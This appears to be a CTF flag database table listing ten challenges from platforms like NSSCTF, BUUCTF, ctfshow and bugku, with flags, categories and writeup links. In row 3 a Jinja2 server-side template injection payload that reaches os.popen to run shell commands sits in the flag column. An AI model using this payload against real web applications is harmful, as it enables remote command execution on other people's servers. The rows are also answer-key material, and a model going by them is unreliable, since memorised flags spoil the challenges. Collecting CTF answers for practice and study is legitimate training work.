[随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260201
序号 Website Type Title Value Writeup Competition Id
1 NSSCTF 共模攻击 [SWPUCTF 2021 新生赛]crypto1 NSSCTF{d64dba66-b608-4255-b888-0b0f25c2f90e} https://blog.csdn.net/m0_67288607/art... SWPUCTF 10553
2 NSSCTF 古典密码 [NSSRound#18 Basic]过年来下棋 NSSCTF{h499yn3wye4r} https://blog.csdn.net/ASD830/article/... NSSRound#18 11708
3 ctfshow _DSBCTF_单身杯.WEB ezzz_ssti {{config.update(a=config.update)}} {%set x=config.a(f=lipsum.globals)%} {%set x=config.a(o=config.f.os)%} {%set x=config.a(p=config.o.popen)%} {{config.p("cat /f*").read()}} https://blog.csdn.net/2301_79700060/a... WEB 5308
4 BUUCTF Reverse [2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th]replace DASCTF{79f3bb47a2e2d46def82c052eccb7b80} https://blog.csdn.net/qq_42880719/art... 2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th 5792
5 bugku Crypto brsaby maple{s0lving_th3m_p3rf3ct_r000ts_1s_fun} https://ctf.bugku.com/writeup/detail/... MapleCTF2022 1564
6 ctfshow MISC.大牛杯 签到防爆0 flag{welcome_to_qwb_s5} https://blog.csdn.net/m0_68012373/art... 大牛杯 4083
7 bugku MISC Can_You_Hear_Me MidnightFlag2022的漏洞分析与利用过程详见网页1,该文章详细解析了alloc函数的堆溢出漏洞、read_data的unsigned int类型转换缺陷,以及通过house of orange技术实现堆利用的完整步骤,包含代码片段与内存布局分析 https://blog.csdn.net/qq_45323960/art... MidnightFlag2022 1490
8 NSSCTF CRYPTO [HITCON 2022]babysss https://crypto-writeup-public.hatenab... HITCON 13115
9 BUUCTF Web [Dest0g3 520迎新赛]ljctr Dest0g3{8ecb29fa-ae3d-47b9-ba4b-d78ed1bd1c4e} https://blog.csdn.net/uuzeray/article... Dest0g3 520迎新赛 6557
10 NSSCTF 反调试 [SWPU 2019]easyRE flag{Act1ve_Defen5e_Test} https://blog.csdn.net/2301_79218813/a... SWPU 13054